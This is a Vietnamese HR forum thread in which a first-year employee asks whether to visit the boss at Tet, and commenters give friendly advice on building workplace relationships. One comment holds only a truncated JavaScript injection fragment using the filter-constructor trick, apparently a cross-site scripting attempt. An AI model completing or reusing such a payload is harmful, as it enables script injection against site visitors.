Chào các anh chị,

Em mới đi làm được một năm. Năm nay là tết đầu tiên của em với sếp và đồng nghiệp. Em không biết mình có nên qua thăm sếp nhân dịp tết này để tạo mối quan hệ tốt với sếp về sau không? Dù biết rằng thực lực mới phản ánh được khả năng thăng tiến của mình, nhưng em cứ nghe mọi người bảo phải tập trung xây dựng mối quan hệ nữa.

Mà em lại ít nói, ngại giao tiếp xã hội. Nên cũng không biết phải làm thế nào?

Mong nhận được sự giúp đỡ của anh chị ạ.

Em xin cám ơn.

 • Black berry Cập nhật lần cuối lúc 02:11 ngày 17/10/2018

  []["filter"]["constructor"](unescape(escape('
 • Cuong Nguyen Manh Cập nhật lần cuối lúc 08:56 ngày 17/09/2018

  Đừng nghĩ việc đến chúc tết nhà Sếp là a dua nịnh nọt. Mà là thể hiện sự tôn trọng của chính mình đối với sếp. Nếu sau này là Sếp bạn cũng sẽ rất vui khi mình được tôn trọng, nhân viên đến chơi nhà thăm hỏi, chỉ đơn giản vậy thôi!
 • Tong Duc Viet Cập nhật lần cuối lúc 01:37 ngày 13/02/2018

  Có thể rủ các anh chị em đồng nghiệp đi với mình là được. Mình nhiều khi cũng ngại đến thăm sếp, sếp lại đánh giá chắc định nhờ vả hay có ý định gì. Mình cũng muốn có một mối quan hệ chân thành với lãnh đạo công ty, anh em không chỉ là cấp trên cấp dưới mà còn là người đồng hành trên sự nghiệp của mình. Mình ủng hộ thăm hỏi sếp, thăm hỏi các anh chị em đồng nghiệp nhé.
 • Hải Đỗ Cập nhật lần cuối lúc 07:55 ngày 12/02/2018

  Mình thấy bạn nếu rảnh, bạn cũng nên rủ đồng nghiệp qua thăm nhà sếp. Theo mình, mục đích là để tạo sự thân thiện giữa bạn và sếp cùng đồng nghiệp. Như vậy thì khi đi làm, mọi trao đổi sẽ trở nên dễ dàng hơn, bạn sẽ thuận lợi hơn trong việc đưa ra ý kiến tranh luận của mình trong các cuộc họp nữa.

  Thật ra mình nghĩ sếp và đồng nghiệp như gia đình thứ hai của mình rồi. Một ngày mình bỏ tới 8 tiếng tại văn phòng mà. Vậy thì nếu có cách nào giúp gắn chặt hơn các mối quan hệ trong văn phòng thì bạn cũng nên thử nha.
  • Dao Lam: Theo mình việc thăm hỏi giao lưu là việc nên làm.
   Nó giúp ích mình rất nhiều trong công việc. Khi mối quan hệ trở nên thân thiết thì làm gì cũng dễ dàng ví dụ như có vấn đề khó khăn trong cv thì những mối quan hệ tốt sẽ nhiệt tình đóng góp ý kiến, cho bạn phương pháp có thể tham khảo để giải quyết cv.

Trả lời chủ đề này

Dao Lam

HR Insider là cổng thông tin sự nghiệp - nhân sự do VietnamWorks vận hành nhằm giúp người đi làm, người tìm việc và nhà tuyển dụng đạt được ước mơ của mình.

Lên đầu trang